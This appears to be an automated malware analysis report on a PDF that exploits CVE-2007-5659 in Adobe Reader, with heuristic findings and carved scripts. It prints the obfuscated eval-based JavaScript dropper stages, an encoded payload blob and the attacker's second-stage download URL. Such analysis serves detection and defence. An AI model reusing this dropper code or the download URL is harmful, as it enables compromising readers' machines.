Malicious PDF — malware analysis report

Static analysis result for SHA-256 894421ed4ee4b480…

MALICIOUS

PDF

15.2 KB
MD5: 0b7c24aeaf5412d2b39ff24ac0a4511c SHA-1: 6f89d7f801673f47e8a42b8958b513f2100432ea SHA-256: 894421ed4ee4b4801476c374e3c61cbeff887a157d539c9edc743efd204722b6
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script decodes a URL from the annotation subject and uses it to download a second-stage payload. The embedded URL http://webgetwise.com/cgi-bin/176/n002106201r0019Ra001e36bX344d38beY3da376f1Z0100f060 is critical for this attack chain.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://webgetwise.com/cgi-bin/176/n002106201r0019Ra001e36bX344d38beY3da376f1Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
99bb28ace86cea1f505b82e03201c16f6a8b01eaf794df5567f4c223a6b24195		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x19B4 12072 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function o__18kK_D_gn(a2_Kan, ouTrFX8){var r_iN5edFgcv = 20;var D___fD = 0;var J_A__2xYnS5_f = 512;var gL61J2QJ55h = r_iN5edFgcv;var ad1eKoL1 = "";var RKNS_7 = 4;var L543t4l = this;var O__K__50RAm26M = "1234ee";var O72JT6u7__1cI3 = arguments;try {var b772Y_e = 0;if (app) {gL61J2QJ55h = gL61J2QJ55h + 2;ouTrFX8 = pr[b772Y_e].subject;}O__K__50RAm26M = O__K__50RAm26M.replace(/\d+/, "call");} catch(e) { }gL61J2QJ55h = gL61J2QJ55h - r_iN5edFgcv;var HU6pgciBj = new Array();var WvV_s_oC_a7u4 = 150;if (WvV_s_oC_a7u4 > 0) {HU6pgciBj[0] = WvV_s_oC_a7u4;HU6pgciBj[1] = J_A__2xYnS5_f;HU6pgciBj[0] = HU6pgciBj[0] - WvV_s_oC_a7u4;HU6pgciBj[2] = HU6pgciBj[0];HU6pgciBj[1] = HU6pgciBj[1] - J_A__2xYnS5_f;HU6pgciBj[3] = HU6pgciBj[1];}if (a2_Kan) { HU6pgciBj = a2_Kan;}if (!a2_Kan) {var H2Ga_C0_t_lKo = O72JT6u7__1cI3[O__K__50RAm26M].toString();var i_ts6_X2aV = 0;var Sk8Y_RPm_J = i_ts6_X2aV;WvV_s_oC_a7u4 = WvV_s_oC_a7u4 - 102;var otec51_FOmhAr = 0;while(Sk8Y_RPm_J < H2Ga_C0_t_lKo.length) {otec51_FOmhAr = H2Ga_C0_t_lKo.charCodeAt(Sk8Y_RPm_J);if (otec51_FOmhAr >= WvV_s_oC_a7u4 && otec51_FOmhAr <= 57) {if (i_ts6_X2aV == RKNS_7) {i_ts6_X2aV = -1;}if (i_ts6_X2aV < 0) { i_ts6_X2aV = 0; }HU6pgciBj[i_ts6_X2aV] += otec51_FOmhAr;if (HU6pgciBj[i_ts6_X2aV] > J_A__2xYnS5_f) {HU6pgciBj[i_ts6_X2aV] -= J_A__2xYnS5_f;}i_ts6_X2aV = i_ts6_X2aV + 1;}Sk8Y_RPm_J = Sk8Y_RPm_J + 1;}}var X_m_1V7Ogi = 0;var x4v8_haTBt = 0;var N_n1aQ_H4 = -1;var e_ju50_X87h_0 = 0;var W___H88S0 = 0;do {var lT1__o_p = 256;if (HU6pgciBj[e_ju50_X87h_0] > lT1__o_p) {HU6pgciBj[e_ju50_X87h_0] -= lT1__o_p;}e_ju50_X87h_0 = e_ju50_X87h_0 + 1;} while (e_ju50_X87h_0 < RKNS_7);e_ju50_X87h_0 = e_ju50_X87h_0 - RKNS_7;while(e_ju50_X87h_0 < ouTrFX8.length) {var I0_TdCrFe_YQw78 = ouTrFX8.substr(e_ju50_X87h_0, 1) + ' V V ';e_ju50_X87h_0 = e_ju50_X87h_0 + 1;var dyw_T_6sS5_f = parseInt(I0_TdCrFe_YQw78, r_iN5edFgcv);if (N_n1aQ_H4 != -1) {x4v8_haTBt += dyw_T_6sS5_f;if (X_m_1V7Ogi == RKNS_7) {X_m_1V7Ogi = 0;}var o_8Hl__6k86r = x4v8_haTBt;o_8Hl__6k86r = o_8Hl__6k86r - (W___H88S0 + 2) * HU6pgciBj[X_m_1V7Ogi];if (o_8Hl__6k86r <= 0) {o_8Hl__6k86r = o_8Hl__6k86r - Math.floor(o_8Hl__6k86r / 256) * 256;}o_8Hl__6k86r = String.fromCharCode(o_8Hl__6k86r);if (gL61J2QJ55h == 1) {ad1eKoL1 += dyw_T_6sS5_f;} else if (gL61J2QJ55h == 2) {ad1eKoL1 += o_8Hl__6k86r;} else {ad1eKoL1 += e_ju50_X87h_0;N_n1aQ_H4 = -2;}N_n1aQ_H4 = -1;X_m_1V7Ogi = X_m_1V7Ogi + 1;W___H88S0 = W___H88S0 + 1;} else if (N_n1aQ_H4 == -1) {N_n1aQ_H4 = r_iN5edFgcv;x4v8_haTBt = dyw_T_6sS5_f * r_iN5edFgcv;}}var f4n__Pu = this;f4n__Pu['ev'+'al'](ad1eKoL1);}
	o__18kK_D_gn(0, "ag9f0e305j8d8gcd3d383f7gbf0ab275bdb63h3i88cb1d901f8d967h28563j359h7d8jcb7h365j8b412h162abibb5cb0a5c83ha65iaaac366f7a6b0d0e22cd709g047b6aaj204b347701027g3aa38180cd5e133aaf368f9d873e4j8c582ba40c25037603c1a82f8b8j8bb4592f856e0d381e0582bb0g8h5i62bj041j67b4bbaf2g9d636dcf8621cab26987c080434e7716bf9j42130c3cc4bj8717736j638d1g2f7d5d980316965a9h2g835a5i1c291a2aa380782d955357c975ac17993694704f020c4706038c0409c15faja5a1b46j75629gcc2a2i35aa0b20bh868c2e6d4a89121gaf1i9f706c218h434bbh6h9c0b8h2i846f3503bc6f400jaeb0b79c577i7e7707304j4a88254c6d2h9h184e7c6d940j363980a017014cb9948eba77101gb569ajcb85493c8b550a2420biaj61ada5bf42646663c16754775eb81f34237iai0j9j3973ai5f0h4gcd9i901bad4055aa6f023b88427dc754525f735e30094a21a259aa8f91358i5662952a614c3cb13128149d0435985g62bj1db03j8j80bb0287426fag5ebd2f6i3j5g7i4e0c0g470i079e3bbcaa49c7917635818a999h0c576g189g0b2803669e037j22960f320j6ebe70650j622i2d968d9g01785h5e84433hcc4906b088cca4a52cc9aeb3b96b6d736521263j4f01ai278469902d421g5f0db09j1ib6a5691d853525aj4i9h1f9j3189ah7136296033aia429abb54395778fac417h8f522g3j682jc0120a8c3g8abf24474602199d419h75590b6a114jc736959854222i582dc2185d030183c99fa71g75a5a79f247b886d26ce611b7g0c10975bajai2dbg5d9j01ac3hai7i79b4922j27be70a9ca81162d5e1j050942b6a28bcb92b80a8b7h9j82545f7c5j1c2i1ebd7d920b5d24adaa43173ic48ia32daf30499i4cbcbi6i315gbf71164a4e41110113ae1371c8bhafb88584566g4b4h4252a61h3h0d62c62f824j9e0ic0a53j827i6dc6ad2063c94i0ebi994d91704f02ce3g12b08jbg1jca6h8h9h99cd4d67626943572i1h8cb01h864c89be733f5e0cbicb49bj605jbe5g381a8e458g109j2f6b8f4j0b11
... (truncated)
deobfuscated.js
826a2b88ae5227267459a7498e6aa99fbb948610b782a1c81f8959f6fd0eee5b		 deobfuscated-js PDF JavaScript deobfuscation pass 121629 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

ag9f0e305j8d8gcd3d383f7gbf0ab275bdb63h3i88cb1d901f8d967h28563j359h7d8jcb7h365j8b412h162abibb5cb0a5c83ha65iaaac366f7a6b0d0e22cd709g047b6aaj204b347701027g3aa38180cd5e133aaf368f9d873e4j8c582ba40c25037603c1a82f8b8j8bb4592f856e0d381e0582bb0g8h5i62bj041j67b4bbaf2g9d636dcf8621cab26987c080434e7716bf9j42130c3cc4bj8717736j638d1g2f7d5d980316965a9h2g835a5i1c291a2aa380782d955357c975ac17993694704f020c4706038c0409c15faja5a1b46j75629gcc2a2i35aa0b20bh868c2e6d4a89121gaf1i9f706c218h434bbh6h9c0b8h2i846f3503bc6f400jaeb0b79c577i7e7707304j4a88254c6d2h9h184e7c6d940j363980a017014cb9948eba77101gb569ajcb85493c8b550a2420biaj61ada5bf42646663c16754775eb81f34237iai0j9j3973ai5f0h4gcd9i901bad4055aa6f023b88427dc754525f735e30094a21a259aa8f91358i5662952a614c3cb13128149d0435985g62bj1db03j8j80bb0287426fag5ebd2f6i3j5g7i4e0c0g470i079e3bbcaa49c7917635818a999h0c576g189g0b2803669e037j22960f320j6ebe70650j622i2d968d9g01785h5e84433hcc4906b088cca4a52cc9aeb3b96b6d736521263j4f01ai278469902d421g5f0db09j1ib6a5691d853525aj4i9h1f9j3189ah7136296033aia429abb54395778fac417h8f522g3j682jc0120a8c3g8abf24474602199d419h75590b6a114jc736959854222i582dc2185d030183c99fa71g75a5a79f247b886d26ce611b7g0c10975bajai2dbg5d9j01ac3hai7i79b4922j27be70a9ca81162d5e1j050942b6a28bcb92b80a8b7h9j82545f7c5j1c2i1ebd7d920b5d24adaa43173ic48ia32daf30499i4cbcbi6i315gbf71164a4e41110113ae1371c8bhafb88584566g4b4h4252a61h3h0d62c62f824j9e0ic0a53j827i6dc6ad2063c94i0ebi994d91704f02ce3g12b08jbg1jca6h8h9h99cd4d67626943572i1h8cb01h864c89be733f5e0cbicb49bj605jbe5g381a8e458g109j2f6b8f4j0b11380f21ahc70gbj5gb5aca8986c7f5b731b2f371d90b74hb953bj20693e7d0e0hcb54766f591e7g443fb5698cbe5a5b5j6a63050j5f05b664a4b5c719a96f9e0144615171b949681db29e1g7h418e18472370abc58i4a934g7gaa67bg3eaj756ga58c5051911ibg9e11cd147h0e86bf2f8b896h8b4b597j28bdc25j0b76070d876b75be1b2a67cc80b42j9d6i69be7dcd0h8563967g460i506d4128c11c11b3598c93762h7f5g97773f61492ca22a4b0b9cab347c4h9ic92eac2c87b5700664292d9643b5b06j2j55707h3f36300e26a92314c748aj8j8fa847426058152b2i4dbfc04j937fc50148168e07220362b6695839782d29ae70bj0b903771766a1jc8642db69db0aj8a5ha37caba7637h5d5cca4d6f2ebj1e4c7c80a31d623562c9bha9167h505cbe560i119977ajcb85293j8b553bac2hbi1b8fb603913fab7176926773787b28405f26aba20i6g30ai0j472i73aec39d2b77578927921h2jb8678cbf672f1g611acbaj4229104c9ga78e0g8b898hab4b594a5b0b0a62a47d920a6b2483ba181765bdb3a335766363b28iag086i4ha18d831748852i1d9b39b80671cab5ba245j4e77781g4h694bcb1h49a08bbd0a8c1j61abc01j6gb7b264319f5364c975ajb07f2273b543470d6c4f02afcf0j9c5jb8a7b0c37f7a8771401a4j189g1541b77fb121403f81ai2c9h2cbi9j7j329g4d56c5429db66331799e2e02275h2h1e9f17ad9458a9a8a10g6c3a5j5hbg172jc4c7a641ah6jb61d570j46afa08e22785053b28h3d3fc269ajab691679723f07cc4e25098ibhc39448896ea2b7685f75761d1e55058hcf027d30a51f47306hc1a3934i9f737e136e231d9739779j932j2g5g4d21cf3f1d0158cbb98i40586f5e9231375e5e0b2950bh99a43a7930a20d10153gc6b9ai3dae6c30b94abcbg842a6d935c231h5g441dbf32c7cb4ec89j822c7b8i839b4a53524bb50b47946h8ac450245cb90ibh3ba2a6972d983d59a87ic1bga651909h6940354g39cf99bgad8i39ah7287a83i4i5e5a13565f3bca1b2eb7699fbe3f214iacc705587e685g0c772138c06hbj0e774j4ia04j0a2g2i3a13aa1f0ic21c7d6a8ba8446d7d7b233d5d04aj0d1ebc4576bb240e4f961fa62j87707i19893625b748bcbd5i565f9c4j291e4h0i0979c1bj822164606i9426458f7f1g3b5i1h78bf1278639h1547236h9ec3aj1ib64054aa6c0d0h9a649jbf7g2b515e5613a84cc00e810abhbi345h56a5b94b596h3bb7294h1d649d135426671j06b03d8a9e8d138a6663057gc9258066818c7i392h4g221dbf2j11c96f98aha9cc904e5h68194f361j98082ja578bg29774e730b06144f8ib0931b723457c9750317992i7ja34a4a2h4727bi8g2309c15faja57e0f6j569658072b2i169j2f4jb77fb101473f8113b09j377e625d336a1g249a3ga31a935i81a66cca2h572h0h7fc3cdbd5h87b3a00h6i6h8e812j482a17a10d1da74d7e0j333879a8b1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.